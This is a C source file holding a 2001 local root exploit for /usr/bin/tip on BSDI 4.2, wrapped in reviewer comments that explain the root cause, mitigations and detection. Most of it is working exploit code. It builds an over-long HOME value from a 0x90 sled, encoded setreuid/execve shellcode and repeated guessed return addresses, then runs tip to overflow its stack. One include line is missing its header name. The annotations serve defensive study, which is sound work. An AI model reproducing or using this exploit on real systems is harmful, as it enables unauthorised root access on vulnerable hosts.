/* !DO NOT DISTRIBUTE! !HHP PRIVATE SOURCE ONLY!
 *
 * qtip.c :: (BSDI 4.2) /usr/bin/tip local root exploit.
 *
 * Author: Cody Tubbs (loophole of hhp).
 * Site: http://www.hhp-programming.net/
 * Email: pigspigs@yahoo.com
 * Date: 6/15/2001. 2:12:54AM CST.
 *
 * Requires access to tip, usualy gid(dialer).
 * ps... sup tip? submitted by tarsin (robbie gubler)
 * or something of the like.
 */

/*
 * Reviewer annotation (defensive reading of this 2001 listing).
 *
 * What the code visibly does: it builds a 268-byte value, exports it as the
 * HOME environment variable, and then executes /usr/bin/tip. The value is
 * laid out as padding, a machine-code payload, and a repeated address.
 *
 * What is inferred, not shown: that tip copies $HOME into a fixed-size stack
 * buffer without a length check, and that tip runs with elevated privilege
 * on the affected system (the "local root" label implies this; confirm
 * against the installed file mode and ownership).
 *
 * Root cause class: unbounded copy of an attacker-controlled environment
 * string inside a privileged program.
 *
 * Mitigation: patch or replace the affected tip binary; remove the
 * privileged mode bits from it, or restrict execution to the group that
 * genuinely needs it; in privileged code, bound every copy of
 * environment-derived data and reject over-long values early. The technique
 * depends on a predictable, executable stack, which stack randomisation and
 * non-executable stacks are designed to counter.
 *
 * Detection: execution of a privileged binary with an environment variable
 * that is unusually long or contains long runs of non-printable bytes
 * (here, runs of 0x90).
 */

#include /* NOTE(review): the header name is missing in this copy of the listing */

#define OSET -288 //Worked for me...

static char shellcode[]= //BSDI self-decoding execve-setreuid shellcode.
"\xeb\x0c\x5e\x31\xc9\xb1\x27\xfe\x0e\x46\xe2\xfb\xeb\x05\xe8\xef\xff"
"\xff\xff\x32\xc1\x52\x52\xb1\x7f\xe9\x15\x01\x01\x01\x69\x30\x30\x74"
"\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x52\x54\x52\x55\x54\x51\xb1\x3c\x9b"
"\x01\x01\x01\x01\x08\x01\xc4"; //...... Author: bighawk[@warfare.com]

/* Reads the current stack pointer through inline assembly (x86, AT&T syntax). */
long get_sp(void){__asm__("movl %esp,%eax");}

/*
 * Builds the over-long HOME value and hands control to /usr/bin/tip.
 * argv[1], when present, replaces the default stack offset OSET.
 */
int main(int argc, char **v){
	char eip[268];
	int cont, i;
	long retaddr, oset=0;

	fprintf(stderr,"(BSDI 4.2) /usr/bin/tip local root exploit.\n");

	/* Offset comes from the command line if given, else the compiled-in default. */
	if(argc>1){oset=atoi(v[1]);}else{oset=OSET;}

	/* Address guess: this process's own stack pointer plus the offset. */
	retaddr=get_sp()+oset;
	fprintf(stderr,"Ret-addr %#x, offset: %d, align: 0.\n",retaddr,oset);

	/* Fill the whole buffer with 0x90 bytes, then place the payload at offset 162. */
	memset(eip,0x90,sizeof(eip));
	memcpy(eip+162,shellcode,strlen(shellcode));

	/* Bytes 224..267 are overwritten with the guessed address in 4-byte steps. */
	for(i=224;i<268;i+=4){*(long *)&eip[i]=retaddr;}

	/*
	 * The crafted value reaches the target only through the environment:
	 * HOME is the untrusted input a fixed tip must length-check.
	 */
	setenv("HOME",eip,1);
	execl("/usr/bin/tip","tip","0",0);
}